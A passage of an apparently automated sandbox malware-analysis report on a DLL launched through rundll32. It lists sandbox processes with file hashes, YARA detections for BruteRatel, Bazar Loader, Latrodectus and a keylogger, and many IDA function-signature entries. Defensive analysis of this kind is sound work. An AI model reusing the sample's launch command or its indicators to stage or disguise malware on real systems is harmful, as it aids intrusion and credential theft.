                                                                                                                                                                                                                          Target ID:23
                                                                                                                                                                                                                          Start time:14:45:03
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",GetDeepDVCState
                                                                                                                                                                                                                          Imagebase:0x7ff7251d0000
                                                                                                                                                                                                                          File size:71'680 bytes
                                                                                                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                          • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000017.00000003.1574746232.0000029F3B8A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_BruteRatel_2, Description: Yara detected BruteRatel, Source: 00000017.00000002.2575784572.0000029F39C98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_Bazar_2, Description: Yara detected Bazar Loader, Source: 00000017.00000002.2578334597.0000029F3B6B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_Bazar_2, Description: Yara detected Bazar Loader, Source: 00000017.00000002.2578591825.0000029F3B750000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000017.00000003.1574660950.0000029F3B8A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                          Target ID:26
                                                                                                                                                                                                                          Start time:14:45:03
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 7596 -s 324
                                                                                                                                                                                                                          Imagebase:0x7ff70fda0000
                                                                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:27
                                                                                                                                                                                                                          Start time:14:45:03
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 7620 -s 320
                                                                                                                                                                                                                          Imagebase:0x7ff70fda0000
                                                                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Target ID:30
                                                                                                                                                                                                                          Start time:14:45:20
                                                                                                                                                                                                                          Start date:03/10/2024
                                                                                                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                          Imagebase:0x7ff633410000
                                                                                                                                                                                                                          File size:5'141'208 bytes
                                                                                                                                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                          • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 0000001E.00000002.2587836163.0000000008AAC000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                                                                            • String ID: /$[thunk]:$`adjustor{$`local static destructor helper'$`template static data member constructor helper'$`template static data member destructor helper'$`vtordispex{$`vtordisp{$extern "C" $private: $protected: $public: $static $virtual $}'
                                                                                                                                                                                                                            • API String ID: 2943138195-2884338863
                                                                                                                                                                                                                            • Opcode ID: a4df0876ac4a94a39638c7196227a47b03e7c172b3727400769d42072db2fcd3
                                                                                                                                                                                                                            • Instruction ID: b4a62fa320740793e51028c586208ea44f21078a71357bd31f68bd1aee6a94b3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4df0876ac4a94a39638c7196227a47b03e7c172b3727400769d42072db2fcd3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BDA2B632614F8886EB92CB54E4813DEB7A1F7883C4F509115FA8987B99EF7CC659CB40
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: $=$.$3$MC1t$^qE?$bIfh$e$eBOO$ioAU$k$l$nEhx$r$sYP
                                                                                                                                                                                                                            • API String ID: 0-1846638993
                                                                                                                                                                                                                            • Opcode ID: 43cc6e01d3af8756f24444348060f7009d82bdb323a80667e739bd446e939b0d
                                                                                                                                                                                                                            • Instruction ID: 0aba12783aff90d63c6f286ccc0a077e7894613a05cce7ad61c0a4bd09775adc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43cc6e01d3af8756f24444348060f7009d82bdb323a80667e739bd446e939b0d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CD1103270168887EB55CF25E4147AD7BA1F749BC8F488025FE8D5BB85EE39DA49C700
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfomemcpy_s
                                                                                                                                                                                                                            • String ID: s
                                                                                                                                                                                                                            • API String ID: 1759834784-453955339
                                                                                                                                                                                                                            • Opcode ID: 60017fd9ff94673ad25669e86eb06ecf37892f2687e360f01889673209030f5b
                                                                                                                                                                                                                            • Instruction ID: c525837b9825935173f9aeacc8cdcd5494a916c687a9243ab5d6eacd3f949041
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 60017fd9ff94673ad25669e86eb06ecf37892f2687e360f01889673209030f5b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABA2E3B26085C88BE7B68E29D5807D97795F38C7CCF519115EB06A7B94DB38DB08CB08
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: memcpy_s
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1502251526-0
                                                                                                                                                                                                                            • Opcode ID: d65eaab545a1f0b3e028d40bc848e10c731a40ca7154dd932d5894c03336bdee
                                                                                                                                                                                                                            • Instruction ID: abfc01c1cae31b126f3606ba6e35873ac6e2165b9242cca6e17ef92ae9629bfb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d65eaab545a1f0b3e028d40bc848e10c731a40ca7154dd932d5894c03336bdee
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4EE1A076204A898BE7B6CF15D488BD937A0F39D7CCF529016EB0947B84DB35CA09CB45
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: memcpy_s
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1502251526-0
                                                                                                                                                                                                                            • Opcode ID: aae69b84937ae52c50460b3a93fd80386282a716ad85a420871dc6e10509decd
                                                                                                                                                                                                                            • Instruction ID: c11a1434eabf13ff3ffc717c65629f10aad66df5d482a187dde0986ab906fb0d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aae69b84937ae52c50460b3a93fd80386282a716ad85a420871dc6e10509decd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55A1BDB2200A848BE7FA8F55E590BD977A0F3697CCF41D116EB4A57B84CB34CA48CB05
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLastNameTranslate$CodePageValidValue
                                                                                                                                                                                                                            • String ID: utf8
                                                                                                                                                                                                                            • API String ID: 1791977518-905460609
                                                                                                                                                                                                                            • Opcode ID: a78d7057517b415f687703166ca4a3cfcdca313bed36a1596b117302a90adb15
                                                                                                                                                                                                                            • Instruction ID: 68df83c6e16fb6719a30522dc5a7a3ce8abf960c58eb50addb9b285837f9a530
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a78d7057517b415f687703166ca4a3cfcdca313bed36a1596b117302a90adb15
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF91AB32200B4986EBA69F21D5513E923A5FB8DBC4F54C121FE5867786EF3AC759C700
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2591520935-0
                                                                                                                                                                                                                            • Opcode ID: 802e43ab5220ed512d0623585b5c6eee699b76c966b13ec90f4942404d9e4e82
                                                                                                                                                                                                                            • Instruction ID: 64d13e85883def1e901923d6c9018b7936bb528f0590fea9e49b5af43c603379
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 802e43ab5220ed512d0623585b5c6eee699b76c966b13ec90f4942404d9e4e82
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20717C72710B0889FBA29B61D8527EC23B4BB4C7C8F44C526BA19677D5EF3A864DC350
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                                                                                            • Opcode ID: 1a631cd767aa6af9efa7e5aa469953c2907d5c4779ab4064bd7ad95633586567
                                                                                                                                                                                                                            • Instruction ID: 483f6a83d11dcc029adc45c6f3cb0b9be83de0b0cb0aa062e5b1d14df8a2b4d4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1a631cd767aa6af9efa7e5aa469953c2907d5c4779ab4064bd7ad95633586567
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D319236204F8486EBA1CF25E8443EE73A4F788798F504126FA8D53B99DF39C659CB00
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                            • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                            • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: $*
                                                                                                                                                                                                                            • API String ID: 0-3982473090
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: $*
                                                                                                                                                                                                                            • API String ID: 0-3982473090
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: e+000$gfff
                                                                                                                                                                                                                            • API String ID: 0-3030954782
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 0000000180041790: GetLastError.KERNEL32 ref: 000000018004179F
                                                                                                                                                                                                                              • Part of subcall function 0000000180041790: FlsGetValue.KERNEL32 ref: 00000001800417B4
                                                                                                                                                                                                                              • Part of subcall function 0000000180041790: SetLastError.KERNEL32 ref: 000000018004183F
                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(?,?,?,000000018005313B,?,00000000,00000092,?,?,00000000,?,00000001800450E9), ref: 00000001800529A2
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3029459697-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 0000000180041790: GetLastError.KERNEL32 ref: 000000018004179F
                                                                                                                                                                                                                              • Part of subcall function 0000000180041790: FlsGetValue.KERNEL32 ref: 00000001800417B4
                                                                                                                                                                                                                              • Part of subcall function 0000000180041790: SetLastError.KERNEL32 ref: 000000018004183F
                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(?,?,?,00000001800530F7,?,00000000,00000092,?,?,00000000,?,00000001800450E9), ref: 0000000180052A52
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3029459697-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(?,?,00000000,00000001800488EF,?,?,?,?,?,?,?,?,00000000,0000000180051E24), ref: 0000000180047AC7
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: EnumLocalesSystem
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2099609381-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: EnumLocalesSystem
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2099609381-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: EnumLocalesSystem
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2099609381-0
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: gfffffff
                                                                                                                                                                                                                            • API String ID: 0-1523873471
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                                                                                                            • Opcode ID: 18c264033b5c03e0796cd7864972cf298c636ea2034c8301feece742694cbdfc
                                                                                                                                                                                                                            • Instruction ID: 801e3fbb0c6ca13713d9e3cb7a72ecea03f622a5a8e9d758b3f95b703ea660cc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 18c264033b5c03e0796cd7864972cf298c636ea2034c8301feece742694cbdfc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69B1C07210474886E7E78F29C0953AD3BA5E74DF88F18911AEF8987399CF35CA88C744
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                                                                                                            • Opcode ID: cb48baa701090f9aedec14d32df1611dc07203fb4bb2fac156f71034c2d87d75
                                                                                                                                                                                                                            • Instruction ID: 65ef7e8e34c5486b43a68c1f6fb74e965974eacd76392e7a2ba2568aa1eda785
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb48baa701090f9aedec14d32df1611dc07203fb4bb2fac156f71034c2d87d75
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07B1907220474885E7EB8F39C5907AD3BA0E34DB88F199115EF4A87396CF35C648C745
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                                                                                                                            • API String ID: 0-595813830
                                                                                                                                                                                                                            • Opcode ID: fe20d45e453fa96ebd0997a9ece8e60e50da2bb89f9b7d3c07397e282436abf1
                                                                                                                                                                                                                            • Instruction ID: 36e2eed64887deb43f59ca417a3340822668f6e529c4fe682e18941d56a36c6d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe20d45e453fa96ebd0997a9ece8e60e50da2bb89f9b7d3c07397e282436abf1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73E04F71602E0CD5FA9B9B81AC507E51291E70CBD4F59D422AE141B3A5DE3C879EC305
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: HeapProcess
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 54951025-0
                                                                                                                                                                                                                            • Opcode ID: 85f156514259d3fad707b68f7e88d7a667a10afc930636faedffb861465dd2df
                                                                                                                                                                                                                            • Instruction ID: 1e887c444bd7a8ee2e01f2d4ca443994fee521a0987a316c7bf8239faa663ea3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85f156514259d3fad707b68f7e88d7a667a10afc930636faedffb861465dd2df
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03B09278A03A08C2EA8A6B61AC8234422A4BB8C740F958028E00D52320DE2D02A98701
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: ac985125e387d8ee1785c7d07e681f8bea089554fdf55ad9e708ad4e88f36c15
                                                                                                                                                                                                                            • Instruction ID: bdb37eef7d95e79d8c3e55c89403c1b48d1ba01ab9340baba4eb2afcbdbc4a0d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac985125e387d8ee1785c7d07e681f8bea089554fdf55ad9e708ad4e88f36c15
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5E1A03620064986EBEB9F1980823EF77A1F748BD4F5AD129AE45473D5DF35CA8AC700
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: e0867f32cf2cb0fec38759676e380358fb842343c7a0329e1ea83c396bef2129
                                                                                                                                                                                                                            • Instruction ID: 4d9f6cbbf1ca453dd679912f6abde7fb0fc90905a9d5ecc38bf79d85316923f7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e0867f32cf2cb0fec38759676e380358fb842343c7a0329e1ea83c396bef2129
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0E1C1B610064885EBEBDF1980823EB67A1F748BD8F56C11ABE854B3D4CF35CA4AC700
Memory Dump Source
